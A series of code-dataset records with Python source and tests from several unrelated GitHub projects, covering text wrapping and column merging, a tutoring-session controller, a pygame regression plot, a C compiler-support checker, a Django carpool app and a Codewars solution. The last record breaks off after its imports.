None\n write_newline = False\n append_c_to_leading = False\n empty = self.empty\n newline_string = self.newline_string\n\n # print(f\"<{c!r}> \", end='')\n\n if not c.isspace():\n word.append(c)\n return\n\n if word:\n write_word = empty.join(word)\n word.clear()\n\n if c == newline_string:\n if write_word:\n write_newline = True\n else:\n write_word = c\n else:\n append_c_to_leading = True\n\n if write_word:\n if leading:\n l = empty.join(leading)\n leading.clear()\n else:\n l = empty\n\n self.state(l, write_word)\n write_word = None\n\n if write_newline:\n self.state(empty, newline_string)\n write_newline = False\n\n if append_c_to_leading:\n leading.append(c)\n append_c_to_leading = False\n\n def close(self):\n # flush the current word, if any.\n if self.word:\n empty = self.empty\n self.state(empty.join(self.leading), empty.join(self.word))\n self.leading.clear()\n self.word.clear()\n\n def state_paragraph_start(self, leading, word):\n \"\"\"\n Initial state. 
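The leading/word contract documented in the comment above can be reproduced as a tiny standalone generator, handy for checking the table shown there (a sketch, not part of the class):

```python
def leading_word_pairs(s):
    # Yield (leading, word) pairs: a "word" is either a maximal run of
    # non-whitespace characters or a single '\n'; every other stretch
    # of whitespace accumulates as the next word's "leading".
    leading, word = [], []
    for c in s:
        if not c.isspace():
            word.append(c)
            continue
        if word:
            yield ''.join(leading), ''.join(word)
            leading.clear()
            word.clear()
        if c == '\n':
            yield ''.join(leading), c
            leading.clear()
        else:
            leading.append(c)
    if word:
        yield ''.join(leading), ''.join(word)

# list(leading_word_pairs('hello there\nhow'))
# -> [('', 'hello'), (' ', 'there'), ('', '\n'), ('', 'how')]
```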
Also the state we return to\n after encountering two '\\n's in a row after\n a text line.\n \"\"\"\n if word == self.newline_string:\n return\n if self.previous_paragraph:\n self.paragraph_break()\n self.previous_paragraph = None\n self.state = self.state_line_start\n self.state(leading, word)\n\n state_initial = state_paragraph_start\n\n def state_line_start(self, leading, word):\n if word == self.newline_string:\n # two '\\n's in a row.\n if self.previous_paragraph == _code_paragraph:\n # we could still be in a code block.\n # remember the whitespace and continue.\n # we don't need to save the leading whitespace.\n self.code.append(word)\n return\n\n self.state = self.state_paragraph_start\n return\n\n if self.allow_code:\n col = 0\n tab_width = self.tab_width\n for c in self.make_iterator(leading):\n if c == self.tab_string:\n col = col + tab_width - (col % tab_width)\n elif c == self.space_string:\n col += 1\n else:\n raise RuntimeError(\"unhandled whitespace character \" + repr(c))\n if col >= self.code_indent:\n # code line!\n if self.previous_paragraph == _text_paragraph:\n self.paragraph_break()\n assert not self.code\n else:\n if self.code:\n for c in self.code:\n self.line_break()\n self.code.clear()\n\n self.state = self.state_code_line_start\n self.state(leading, word)\n return\n\n if self.previous_paragraph == _code_paragraph:\n self.paragraph_break()\n self.state = self.state_text_line_start\n self.state(leading, word)\n\n def state_text_line_start(self, leading, word):\n self.previous_paragraph = _text_paragraph\n self.state = self.state_in_text_line\n self.state(leading, word)\n\n def state_in_text_line(self, leading, word):\n if word == self.newline_string:\n self.state = self.state_line_start\n return\n self.emit(word)\n\n def state_code_line_start(self, leading, word):\n self.previous_paragraph = _code_paragraph\n self.col = 0\n self.state = self.state_in_code_line\n self.state(leading, word)\n\n def state_in_code_line(self, leading, word):\n if word == self.newline_string:\n self.emit(self.empty.join(self.code))\n self.code.clear()\n self.state = self.state_line_start\n self.state(self.empty, word)\n return\n\n tab_width = self.tab_width\n convert_tabs_to_spaces = self.convert_tabs_to_spaces\n col = self.col\n tab_string = self.tab_string\n space_string = self.space_string\n for c in self.make_iterator(leading):\n if c == tab_string:\n delta = tab_width - (col % tab_width)\n col += delta\n if convert_tabs_to_spaces:\n self.code.append(space_string * delta)\n else:\n self.code.append(c)\n elif c == space_string:\n col += 1\n self.code.append(c)\n else:\n raise RuntimeError(\"unhandled whitespace character \" + repr(c))\n self.code.append(word)\n self.col = col + len(word)\n\n\n\n@_export\ndef split_text_with_code(s, *, tab_width=8, allow_code=True, code_indent=4, convert_tabs_to_spaces=True):\n \"\"\"\n Splits the string s into individual words,\n suitable for feeding into wrap_words.\n\n s may be either str or bytes.\n\n Paragraphs indented by less than code_indent will be\n broken up into individual words.\n\n If `allow_code` is true, paragraphs indented by at least\n code_indent spaces will preserve their whitespace:\n internal whitespace is preserved, and the newline is\n preserved. 
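A hedged round-trip sketch combining this function with wrap_words (hypothetical input; the exact re-wrapped prose depends on the margin, but the indented block should pass through verbatim):

```python
import big

s = ("An example paragraph of prose that will be re-wrapped to the margin.\n"
     "\n"
     "    for i in range(3):\n"
     "        print(i)\n"
     "\n"
     "More prose after the code example.\n")

words = big.split_text_with_code(s)   # code_indent defaults to 4
print(big.wrap_words(words, margin=40))
```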
(This will preserve the formatting of code\n examples, when these words are rejoined into lines\n by wrap_words.)\n\n s can be str, bytes, or a subclass of either, though\n split_text_with_code will only return str or bytes.\n\n if s is empty, returns a list containing an empty string.\n \"\"\"\n is_bytes = isinstance(s, bytes)\n if is_bytes:\n iterable = _iterate_over_bytes(s)\n empty = b''\n else:\n iterable = s\n empty = ''\n\n cws = _column_wrapper_splitter(is_bytes, tab_width, allow_code, code_indent, convert_tabs_to_spaces)\n\n for c in iterable:\n cws.write(c)\n cws.close()\n return_value = cws.words\n if not return_value:\n return [empty]\n return return_value\n\n\n@_export\nclass OverflowStrategy(enum.Enum):\n \"\"\"\n Enum providing constants to specify how merge_columns\n handles overflow in columns.\n \"\"\"\n INVALID = enum.auto()\n RAISE = enum.auto()\n INTRUDE_ALL = enum.auto()\n # INTRUDE_MINIMUM = enum.auto() # not implemented yet\n DELAY_ALL = enum.auto()\n # DELAY_MINIMUM = enum.auto() # not implemented yet\n\n@_export\ndef merge_columns(*columns, column_separator=None,\n overflow_strategy=OverflowStrategy.RAISE,\n overflow_before=0,\n overflow_after=0,\n ):\n \"\"\"\n Merge n column tuples, with each column tuple being\n formatted into its own column in the resulting string.\n Returns a string.\n\n columns should be an iterable of column tuples.\n Each column tuple should contain three items:\n (text, min_width, max_width)\n text should be a single string, either str or bytes,\n with newline characters separating lines. min_width\n and max_width are the minimum and maximum permissible\n widths for that column, not including the column\n separator (if any).\n\n Note that this function doesn't text-wrap the lines.\n\n column_separator is printed between every column.\n\n overflow_strategy tells merge_columns how to handle a column\n with one or more lines that are wider than that column's max_width.\n The supported values are:\n\n OverflowStrategy.RAISE\n\n Raise an OverflowError. 
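As a minimal usage sketch before the remaining strategies (the widths here are arbitrary and the separator defaults to a single space):

```python
import big

left = "one\ntwo\nthree"
right = "alpha\nbeta\ngamma"

# each column tuple is (text, min_width, max_width)
print(big.merge_columns((left, 4, 6), (right, 5, 8)))
# expected, roughly:
# one    alpha
# two    beta
# three  gamma
```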
The default.\n\n OverflowStrategy.INTRUDE_ALL\n\n Intrude into all subsequent columns on all lines\n where the overflowed column is wider than its max_width.\n\n OverflowStrategy.DELAY_ALL\n\n Delay all columns after the overflowed column,\n not beginning any until after the last overflowed line\n in the overflowed column.\n\n When overflow_strategy is INTRUDE_ALL or DELAY_ALL, and\n either overflow_before or overflow_after is nonzero, these\n specify the number of extra lines before or after\n the overflowed lines in a column.\n\n text and column_separator can be str, bytes, or a subclass\n of either, though merge_columns will only return str or bytes.\n All these objects (text and column_separator) must have the\n same baseclass, str or bytes.\n \"\"\"\n assert overflow_strategy in (OverflowStrategy.INTRUDE_ALL, OverflowStrategy.DELAY_ALL, OverflowStrategy.RAISE)\n raise_overflow_error = overflow_strategy == OverflowStrategy.RAISE\n delay_all = overflow_strategy == OverflowStrategy.DELAY_ALL\n\n assert columns\n is_bytes = isinstance(columns[0][0], bytes)\n\n if is_bytes:\n empty = b''\n space = b' '\n newline = b'\\n'\n else:\n empty = ''\n space = ' '\n newline = '\\n'\n\n if column_separator is None:\n column_separator = space\n\n _columns = columns\n columns = []\n empty_columns = []\n last_too_wide_lines = []\n max_lines = -1\n\n column_spacing = len(column_separator)\n\n for column_number, (s, min_width, max_width) in enumerate(_columns):\n\n # check types, let them raise exceptions as needed\n operator.index(min_width)\n operator.index(max_width)\n\n empty_columns.append(max_width * space)\n\n if isinstance(s, (str, bytes)):\n lines = s.rstrip().split(newline)\n else:\n lines = s\n max_lines = max(max_lines, len(lines))\n\n # loop 1:\n # measure each line length, determining\n # * maximum line length, and\n # * all overflow lines\n rstripped_lines = []\n overflows = []\n max_line_length = -1\n in_overflow = False\n\n def add_overflow():\n nonlocal in_overflow\n in_overflow = False\n if overflows:\n last_overflow = overflows[-1]\n if last_overflow[1] >= (overflow_start - 1):\n overflows.pop()\n overflows.append((last_overflow[0], overflow_end))\n return\n overflows.append((overflow_start, overflow_end))\n\n for line_number, line in enumerate(lines):\n line = line.rstrip()\n assert not newline in line\n rstripped_lines.append(line)\n\n length = len(line)\n max_line_length = max(max_line_length, length)\n\n line_overflowed = length > max_width\n if (not in_overflow) and line_overflowed:\n # starting new overflow\n if raise_overflow_error:\n raise OverflowError(f\"overflow in column {column_number}: {line!r} is {length} characters, column max_width is {max_width}\")\n overflow_start = max(line_number - overflow_before, 0)\n in_overflow = True\n elif in_overflow and (not line_overflowed):\n # ending current overflow\n overflow_end = line_number - 1 + overflow_after\n add_overflow()\n\n if in_overflow:\n overflow_end = line_number + overflow_after\n add_overflow()\n for i in range(overflow_after):\n rstripped_lines.append(empty)\n\n if delay_all and overflows:\n overflows.clear()\n overflows.append((0, overflow_end))\n\n # loop 2:\n # compute padded lines and in_overflow for every line\n padded_lines = []\n overflows.reverse()\n overflow_start = overflow_end = None\n def next_overflow():\n nonlocal overflow_start\n nonlocal overflow_end\n if overflows:\n overflow_start, overflow_end = overflows.pop()\n else:\n overflow_start = overflow_end = sys.maxsize\n\n in_overflow = False\n 
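        # loop 2 walks the overflow intervals in ascending order: lines
        # inside an interval keep their full (overflowing) width and are
        # flagged in_overflow=True, which tells the rendering loop below
        # to stop emitting later columns on that row; all other lines
        # are padded out to max_width.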
next_overflow()\n        for line_number, line in enumerate(lines):\n            if line_number > overflow_end:\n                in_overflow = False\n                next_overflow()\n            if line_number >= overflow_start:\n                in_overflow = True\n            if not in_overflow:\n                line = line.ljust(max_width)\n            padded_lines.append((line, in_overflow))\n\n        columns.append(padded_lines)\n\n\n    column_iterators = [iter(c) for c in columns]\n    lines = []\n\n    while True:\n        line = []\n        all_iterators_are_exhausted = True\n        add_separator = False\n        in_overflow = False\n        for column_iterator, empty_column in zip(column_iterators, empty_columns):\n            if add_separator:\n                line.append(column_separator)\n            else:\n                add_separator = True\n\n            try:\n                column, in_overflow = next(column_iterator)\n                all_iterators_are_exhausted = False\n            except StopIteration:\n                column = empty_column\n            line.append(column)\n            if in_overflow:\n                break\n        if all_iterators_are_exhausted:\n            break\n        line = empty.join(line).rstrip()\n        lines.append(line)\n\n    text = newline.join(lines)\n    return text.rstrip()\n\n@_export\ndef int_to_words(i, *, flowery=True, ordinal=False):\n    \"\"\"\n    Converts an integer into the equivalent English string.\n\n    int_to_words(2) -> \"two\"\n    int_to_words(35) -> \"thirty-five\"\n\n    If the keyword-only parameter \"flowery\" is true,\n    you also get commas and the word \"and\" where you'd expect them.\n    (When \"flowery\" is True, int_to_words(i) produces identical\n    output to inflect.engine().number_to_words(i).)\n\n    If the keyword-only parameter \"ordinal\" is true,\n    the string produced describes that *ordinal* number\n    (instead of that *cardinal* number).  Ordinal numbers\n    describe position, e.g. where a competitor placed in a\n    competition.  int_to_words(1) returns the string 'one',\n    but int_to_words(1, ordinal=True) returns the string 'first'.\n\n    Numbers >= 10**75 (one quadrillion vigintillion)\n    are only converted using str(i).  Sorry!\n    \"\"\"\n    if not isinstance(i, int):\n        raise TypeError(\"i must be int\")\n\n    if (i >= 10**75) or (i <= -10**75):\n        return str(i)\n\n    is_negative = i < 0\n    if is_negative:\n        i = -i\n\n    if ordinal:\n        first_twenty = (\n            \"zeroth\",\n            \"first\", \"second\", \"third\", \"fourth\", \"fifth\",\n            \"sixth\", \"seventh\", \"eighth\", \"ninth\", \"tenth\",\n            \"eleventh\", \"twelfth\", \"thirteenth\", \"fourteenth\", \"fifteenth\",\n            \"sixteenth\", \"seventeenth\", \"eighteenth\", \"nineteenth\",\n            )\n    else:\n        first_twenty = (\n            \"zero\",\n            \"one\", \"two\", \"three\", \"four\", \"five\",\n            \"six\", \"seven\", \"eight\", \"nine\", \"ten\",\n            \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n            \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\",\n            )\n\n    tens = (\n        None, None, \"twenty\", \"thirty\", \"forty\", \"fifty\",\n        \"sixty\", \"seventy\", \"eighty\", \"ninety\",\n        )\n\n    strings = []\n    append = strings.append\n    spacer = ''\n\n    # go-faster stripes shortcut:\n    # most numbers are small.\n    # the fastest route is for numbers < 100.\n    # the next-fastest is for numbers < 1 trillion.\n    # the slow route handles numbers < 10**66.\n    if i >= 100:\n        if i >= 10**12:\n            quantities = (\n                # note! 
v leading spaces!\n                (10**63, \" vigintillion\"),\n                (10**60, \" novemdecillion\"),\n                (10**57, \" octodecillion\"),\n                (10**54, \" septendecillion\"),\n                (10**51, \" sexdecillion\"),\n                (10**48, \" quindecillion\"),\n                (10**45, \" quattuordecillion\"),\n                (10**42, \" tredecillion\"),\n                (10**39, \" duodecillion\"),\n                (10**36, \" undecillion\"),\n                (10**33, \" decillion\"),\n                (10**30, \" nonillion\"),\n                (10**27, \" octillion\"),\n                (10**24, \" septillion\"),\n                (10**21, \" sextillion\"),\n                (10**18, \" quintillion\"),\n                (10**15, \" quadrillion\"),\n                (10**12, \" trillion\"),\n                (10** 9, \" billion\"),\n                (10** 6, \" million\"),\n                (10** 3, \" thousand\"),\n                (10** 2, \" hundred\"),\n                )\n        else:\n            quantities = (\n                # note! v leading spaces!\n                (10** 9, \" billion\"),\n                (10** 6, \" million\"),\n                (10** 3, \" thousand\"),\n                (10** 2, \" hundred\"),\n                )\n\n        for threshold, english in quantities:\n            if i >= threshold:\n                upper = i // threshold\n                i = i % threshold\n                append(spacer)\n                append(int_to_words(upper, flowery=flowery))\n                append(english)\n                spacer = ', ' if flowery else ' '\n\n    if strings:\n        spacer = \" and \" if flowery else \" \"\n\n    if i >= 20:\n        t = i // 10\n        append(spacer)\n        append(tens[t])\n        spacer = '-'\n        i = i % 10\n\n    # don't add \"zero\" to the end if we already have strings\n    if i or (not strings):\n        append(spacer)\n        append(first_twenty[i])\n    elif ordinal and strings:\n        if strings[-1][-1] == 'y':\n            s = strings.pop()\n            strings.append(s[:-1] + \"ie\")\n        strings.append(\"th\")\n\n    if is_negative:\n        strings.insert(0, \"negative \")\n\n    return \"\".join(strings)\n\n","repo_name":"larryhastings/big","sub_path":"big/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":113954,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"21"}
{"seq_id":"20607762305","text":"import smtplib\n\nfrom testutils import EnseignerTestCase\n\nimport enseigner.model as model\nimport enseigner.emails as emails\nimport enseigner.controller as controller\n\nclass ControllerTestCase(EnseignerTestCase):\n    def testCreateSession(self):\n        sub1 = model.Subject.create('foo', False)\n        sub2 = model.Subject.create('bar', True)\n        sub3 = model.Subject.create('baz', False)\n        s1 = controller.create_session('24/12/2014 22:55', ['qux', 'quux'])\n        s2 = controller.create_session('24/12/2014 22:55', ['corge'])\n        self.assertEqual({x.name for x in model.Subject.all()},\n                {'foo', 'bar', 'baz', 'qux', 'quux', 'corge'})\n        self.assertEqual({x.name for x in model.SessionSubject.all_subjects_for_session(s1)},\n                {'foo', 'bar', 'baz', 'qux', 'quux'})\n        self.assertEqual({x.name for x in model.SessionSubject.all_subjects_for_session(s2)},\n                {'foo', 'bar', 'baz', 'corge'})\n\n    def testTutorSubscription(self):\n        sub1 = model.Subject.create('foo', False)\n        sub2 = model.Subject.create('bar', True)\n        sub3 = model.Subject.create('baz', False)\n        t1 = model.Tutor.create('foo', 'bar', 'baz', False)\n        t2 = model.Tutor.create('foo2', 'bar', 'baz', False)\n        s1 = controller.create_session('26/12/2014 20:50', ['qux', 'quux'])\n        s2 = controller.create_session('26/12/2014 20:50', ['corge'])\n        sub4 = [x for x in model.SessionSubject.all_subjects_for_session(s1) if x.name == 'qux'][0]\n        h = controller.hash_subscription_params(s1.sid, 'tutor', t1.uid)\n        self.assertEqual(controller.get_tutor_form_data(str(s1.sid), str(t1.uid), h),\n                (t1, set(), 0, ''))\n        self.assertRaises(controller.WrongHash,\n                controller.get_tutor_form_data, str(s1.sid), str(t1.uid), '')\n        controller.set_tutor_form_data(str(s1.sid), str(t1.uid), h, 
[(str(sub1.sid), 1), (str(sub4.sid), 2)], 3, 'qux')\n d = controller.get_tutor_form_data(str(s1.sid), str(t1.uid), h)\n self.assertEqual(d.tutor.email, 'foo')\n self.assertEqual(d.tutor.name, 'bar')\n self.assertEqual({x[0].name for x in d.subjects}, {'foo', 'qux'})\n self.assertEqual(d.group_size, 3)\n self.assertEqual(d.comment, 'qux')\n self.assertRaises(controller.WrongHash,\n controller.get_tutor_form_data, str(s1.sid), str(t1.uid), '')\n\n controller.set_tutor_form_data(str(s1.sid), str(t1.uid), h, [(str(sub1.sid), 1), (str(sub3.sid), 2)], 4, 'quux')\n (tutor, subjects, group_size, comment) = controller.get_tutor_form_data(str(s1.sid), str(t1.uid), h)\n self.assertEqual(tutor.email, 'foo')\n self.assertEqual(tutor.name, 'bar')\n self.assertEqual({x[0].name for x in subjects}, {'foo', 'baz'})\n self.assertEqual(group_size, 4)\n self.assertEqual(comment, 'quux')\n\n def testStudentSubscription(self):\n sub1 = model.Subject.create('foo', False)\n sub2 = model.Subject.create('bar', True)\n sub3 = model.Subject.create('baz', False)\n st1 = model.Student.create('foo', 'bar', '', False)\n st2 = model.Student.create('foo2', 'bar2', '', False)\n s1 = controller.create_session('27/12/2014 11:47', ['qux', 'quux'])\n s2 = controller.create_session('27/12/2014 11:47', ['corge'])\n sub4 = [x for x in model.SessionSubject.all_subjects_for_session(s1) if x.name == 'qux'][0]\n h = controller.hash_subscription_params(s1.sid, 'student', st1.uid)\n self.assertEqual(controller.get_student_form_data(str(s1.sid), str(st1.uid), h),\n (st1, None, 0, ''))\n self.assertRaises(controller.WrongHash,\n controller.get_tutor_form_data, str(s1.sid), str(st1.uid), '')\n controller.set_student_form_data(str(s1.sid), str(st1.uid), h, str(sub1.sid), 3, 'qux')\n d = controller.get_student_form_data(str(s1.sid), str(st1.uid), h)\n self.assertEqual(d.student.emails, 'foo')\n self.assertEqual(d.student.name, 'bar')\n self.assertEqual(d.subject.name, 'foo')\n self.assertEqual(d.friends, 3)\n self.assertEqual(d.comment, 'qux')\n self.assertRaises(controller.WrongHash,\n controller.get_student_form_data, str(s1.sid), str(st1.uid), '')\n\n controller.set_student_form_data(str(s1.sid), str(st1.uid), h, str(sub3.sid), 4, 'quux')\n (student, subject, friends, comment) = controller.get_student_form_data(str(s1.sid), str(st1.uid), h)\n self.assertEqual(student.emails, 'foo')\n self.assertEqual(student.name, 'bar')\n self.assertEqual(subject.name, 'baz')\n self.assertEqual(friends, 4)\n self.assertEqual(comment, 'quux')\n\n def testSendTutorEmailSuccess(self):\n s1 = controller.create_session('28/12/2014 12:17', [])\n t1 = model.Tutor.create('foo', 'bar', 'baz', False)\n t2 = model.Tutor.create('foo2', 'bar2', 'baz', False)\n self.assertEqual(controller.send_tutor_email(s1, lambda x:'f', 'toto', 'titi $nom_tuteur'), [])\n self.assertEqual(set(emails.MockSender.queue), {\n ('foo', 'toto', 'titi bar'),\n ('foo2', 'toto', 'titi bar2')\n })\n\n def testSendTutorEmailError(self):\n s1 = controller.create_session('28/12/2014 12:17', [])\n t1 = model.Tutor.create('foo', 'bar', 'baz', False)\n t2 = model.Tutor.create('foo2', 'bar2', 'baz', False)\n errored = set()\n original_send = emails.MockSender.send\n def fakesend(self, recipient, subject, content):\n errored.add((recipient, subject, content))\n emails.MockSender.send = original_send\n raise smtplib.SMTPException()\n emails.MockSender.send = fakesend\n errors = controller.send_tutor_email(s1, lambda x:'f', 'toto', 'titi $nom_tuteur')\n self.assertEqual(len(errors), 1, errors)\n 
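        # fakesend restores the real send() before raising, so exactly
        # one recipient fails while the remaining message is still
        # delivered to the queue normally.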
self.assertTrue(errored)\n self.assertEqual(set(emails.MockSender.queue), {\n ('foo', 'toto', 'titi bar'),\n ('foo2', 'toto', 'titi bar2')\n } - errored)\n","repo_name":"progval/site-enseigner","sub_path":"tests/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17855860023","text":"\"\"\" April 18, 2021 \"\"\"\n\nimport pygame\nimport numpy as np\nfrom setup.settings import Settings\n\n\nclass Arr:\n\n def __init__(self):\n pygame.init()\n self.set = Settings()\n\n ## Fundamental anchors -- directly equate to the arr min and max\n self.pixel_origin = (200, 850)\n self.pixel_w = 1200\n self.pixel_h = 700\n\n ## How many labels to divide each axis into\n self.x_num_labels = 17 ## Gives shorter floats\n self.y_num_labels = 15\n\n ### Pixel units\n self.configure_pixel_scale()\n\n ### Array units\n self.arr = np.load('data/basic_arr.npy')\n self.configure_arr()\n self.configure_arr_scale()\n\n\n ### Agnostic units\n self.configure_conversion_factor()\n self.get_centroid()\n\n self.buffer = 50\n self.configure_false_axes()\n\n self.regression()\n self.get_pixels_of_arr()\n\n\n \"\"\" CONFIGURATION STUFF \"\"\"\n\n ### PIXELS\n def configure_pixel_scale(self):\n\n # Set pixel min/max\n self.pixel_x_min, self.pixel_y_max = self.pixel_origin\n self.pixel_x_max = self.pixel_x_min + self.pixel_w\n self.pixel_y_min = self.pixel_y_max - self.pixel_h\n\n self.pixel_x_scale = np.linspace( (self.pixel_x_min), (self.pixel_x_max), self.x_num_labels )\n self.pixel_y_scale = np.linspace( (self.pixel_y_max), (self.pixel_y_min), self.y_num_labels )\n\n\n ### ARR\n def configure_arr(self):\n # Set arr min/max\n x, y = self.arr[:,0], self.arr[:,1]\n self.arr_x_min, self.arr_x_max = x.min(), x.max()\n self.arr_y_min, self.arr_y_max = y.min(), y.max()\n\n self.arr_origin = (self.arr_x_min, self.arr_y_min)\n\n def configure_arr_scale(self):\n self.arr_x_scale = np.linspace( self.arr_x_min, self.arr_x_max, self.x_num_labels )\n self.arr_y_scale = np.linspace( self.arr_y_min, self.arr_y_max, self.y_num_labels )\n\n\n\n \"\"\" CONVERSION STUFF \"\"\"\n\n def configure_conversion_factor(self):\n ## X\n # Pick the element from the same index location in each scale\n arr_x = self.arr_x_scale[7]\n arr_y = self.arr_y_scale[7]\n pixel_x = self.pixel_x_scale[7]\n pixel_y = self.pixel_y_scale[7]\n\n # Zero these\n arr_x -= self.arr_x_min\n arr_y -= self.arr_y_min\n pixel_x -= self.pixel_x_min\n pixel_y = self.pixel_y_max - pixel_y\n\n # Get conversion factor\n self.x_to_arr = arr_x / pixel_x\n self.y_to_arr = arr_y / pixel_y\n\n # Reverse direction = inverse\n self.x_to_pixels = 1 / self.x_to_arr\n self.y_to_pixels = 1 / self.y_to_arr\n\n\n def convert_to_arr(self, pixel_coords):\n x, y = pixel_coords\n\n ## Zero the passed coord\n x -= self.pixel_x_min\n y = self.pixel_y_max - y\n\n ### Convert\n x *= self.x_to_arr\n y *= self.y_to_arr\n\n ### Add back the zero coord in arr units\n x += self.arr_x_min\n y += self.arr_y_min\n\n return x, y\n\n\n def convert_to_pixels(self, arr_coords):\n x, y = arr_coords\n\n ## Find x, y values relative to arr origin\n x -= self.arr_x_min\n y -= self.arr_y_min\n\n ## Scale those values to be pixels\n x *= self.x_to_pixels\n y *= self.y_to_pixels\n\n ## Find x, y values relative to arr origin\n x += self.pixel_x_min\n y = self.pixel_y_max - y\n\n return int(x), int(y) ## Pixel values should be int\n\n\n def get_centroid(self):\n x = 
self.arr[:,0].mean()\n y = self.arr[:,1].mean()\n\n self.arr_centroid = [x, y]\n self.pixel_centroid = list( self.convert_to_pixels( (x, y) ) )\n\n\n def get_pixels_of_arr(self):\n arr = []\n for coord in self.arr:\n pixels = self.convert_to_pixels(coord)\n arr.append( tuple(pixels) )\n\n self.pixels_of_arr = tuple(arr)\n\n\n\n \"\"\" FIND COEFFICIENTS AND SSE FOR BEST-FIT LINE \"\"\"\n def regression(self):\n x_mean, y_mean = self.arr_centroid\n x_dev = self.arr[:,0] - x_mean\n y_dev = self.arr[:,1] - y_mean\n\n numerator = (x_dev * y_dev).sum()\n denom = (x_dev**2).sum()\n\n self.b1 = numerator/denom\n self.b0 = y_mean - self.b1*x_mean\n\n pred = self.b0 + (self.b1 * self.arr[:,0])\n error = self.arr[:,1] - pred\n squared_error = error**2\n self.SSE = squared_error.sum()\n\n\n\n \"\"\" UTILITY \"\"\"\n def configure_false_axes(self):\n\n x, y = self.pixel_origin\n\n self.false_axes_origin = (x - self.buffer, y + self.buffer)\n self.false_axis_w = self.pixel_w + (2 * self.buffer)\n self.false_axis_h = self.pixel_h + (2 * self.buffer)\n","repo_name":"Biuku/LinearRegressionGame","sub_path":"arr.py","file_name":"arr.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"11151667000","text":"import distutils.ccompiler\nimport os\nimport random\nimport subprocess\n\n\"\"\"\nThese classes allow a test to see if source code with the C compiler actually\ncompiles.\n\"\"\"\n\nDEFAULT_COMPILER = distutils.ccompiler.get_default_compiler()\n\nC_EXTENSION = \".c\"\n\ndef create_file_with_rand_name(source):\n cur_dir = os.getcwd()\n rand_file = os.path.join(cur_dir, \"c_\" + str(random.getrandbits(72)))\n while os.path.exists(rand_file):\n rand_file = os.path.join(cur_dir, \"c_\" + str(random.getrandbits(72)))\n with open(rand_file + C_EXTENSION, \"w\") as c_file:\n c_file.write(source)\n return rand_file\n\nclass CheckCCompiles(object):\n\n def __init__(self, name = \"\", source_code = \"\"):\n self.name = name\n self.source_code = source_code\n self.compiler = distutils.ccompiler.new_compiler()\n if DEFAULT_COMPILER == 'unix':\n # The idea here is that we want to have the compiler try and generate all the possible\n # simd instructions, then see by running it, if we get an illegal hardware instruction\n self.extra_args = [\"-m\" + self.name]\n elif DEFAULT_COMPILER == 'msvc':\n self.extra_args = ['/arch:AVX', '/arch:AVX2', '/arch:AVX512']\n else:\n self.extra_args = []\n self.works = False\n\n def try_run(self):\n try:\n self.run_result = subprocess.run(self.file_name, check=False)\n self.works = self.run_result.returncode == 0\n except Exception:\n self.works = False\n return self.works\n \n def __enter__(self):\n self.file_name = create_file_with_rand_name(self.source_code)\n self.c_name = self.file_name + C_EXTENSION\n try:\n self.obj_names = self.compiler.compile([self.c_name], extra_preargs=self.extra_args)\n except Exception as exc:\n print(\"FAILED \" + self.name + \" compile check: \" + str(exc))\n return self\n self.compiles = True\n try:\n self.compiler.link_executable(self.obj_names, self.file_name)\n except Exception as exc:\n print(\"FAILED \" + self.name + \" link check: \" + str(exc))\n return self\n self.links = True\n if self.try_run():\n print(\"PASSED \" + self.name)\n else:\n print(\"FAILED \" + self.name + \" run check: \" + str(self.run_result.stderr))\n return self\n \n def __exit__(self, exc_type, exc_val, exc_tb):\n try:\n os.remove(self.c_name)\n if os.name == 'nt':\n 
os.remove(self.file_name + \".exe\")\n else:\n os.remove(self.file_name)\n for objfile in self.obj_names:\n os.remove(objfile)\n except Exception as exc:\n # Avoid noise for non existant files\n return","repo_name":"jweinst1/pysimd","sub_path":"check_c_compiles.py","file_name":"check_c_compiles.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"21440088650","text":"from django.core.urlresolvers import resolve\nfrom django.template.loader import render_to_string\nfrom django.test import TestCase\nfrom django.http import HttpRequest\nfrom carpool.models import Rider, Driver\nfrom carpool.views import home_page, new_user_page\n\n# Create your tests here.\nclass HomePageTest(TestCase):\n\n def test_root_url_resolves_to_home_page_view(self):\n found = resolve('/')\n self.assertEqual(found.func, home_page)\n\n def test_home_page_returns_correct_html(self):\n request = HttpRequest()\n response = home_page(request)\n expected_html = render_to_string('base.html')\n #self.assertEqual(response.content.decode(), expected_html)\n\n def test_home_page_saves_name_and_posts_to_new_page(self):\n request = HttpRequest()\n request.method = 'POST'\n\n request.POST['first_name_text'] = 'Ella'\n request.POST['last_name_text'] = 'Holmes'\n request.POST['start_text'] = 'New York'\n request.POST['end_text'] = 'Boston'\n request.POST['date_text'] = '1/1/11'\n\n response = new_user_page(request)\n\n self.assertIn('Ella', response.content.decode())\n self.assertIn('Holmes', response.content.decode())\n self.assertIn('New York', response.content.decode())\n self.assertIn('Boston', response.content.decode())\n self.assertIn('1/1/11', response.content.decode())\n","repo_name":"EllaHolmes/Carpool","sub_path":"superlists/carpool/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5746079809","text":"def first_non_repeating_letter(string):\n \"\"\"\n # https://www.codewars.com/kata/52bc74d4ac05d0945d00054e\n # First non-repeating character\n \"\"\"\n if len(string) == 1:\n return string\n\n ss = string[:].lower()\n for i in range(len(ss)-1):\n if ss.count(ss[i]) == 1:\n return string[i]\n\n return ''\n","repo_name":"ioneov/codewars_kata","sub_path":"5kyu/first_non_repeating_letter.py","file_name":"first_non_repeating_letter.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24361060036","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Test figure 4ab\"\"\"\n\nimport inspect\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .utils import dump_values, load_values, PLOT_DIR\nfrom tdsr import CFM, RSD, TDSR1\nfrom 